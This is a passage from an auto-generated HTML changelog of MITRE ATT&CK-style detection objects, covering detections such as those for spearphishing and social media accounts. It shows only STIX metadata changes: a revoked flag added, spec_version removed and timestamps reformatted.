1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0866] Detection of Search Threat Vendor Data</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0810] Detection of Search Victim-Owned Websites</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0897] Detection of Selective Exclusion</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-23T17:50:38.555Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-23 17:50:38.555000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-11-12T22:03:39.105Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0871] Detection of Server</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0874] Detection of Server</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0864] Detection of Serverless</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0829] Detection of Serverless</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0812] Detection of Social Media</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0851] Detection of Social Media Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0870] Detection of Social Media Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0888] Detection of Software</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0865] Detection of Spearphishing Attachment</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0878] Detection of Spearphishing Link</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0821] Detection of Spearphishing Service</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0886] Detection of Spearphishing Voice</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0898] Detection of Spoofed User-Agent</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid 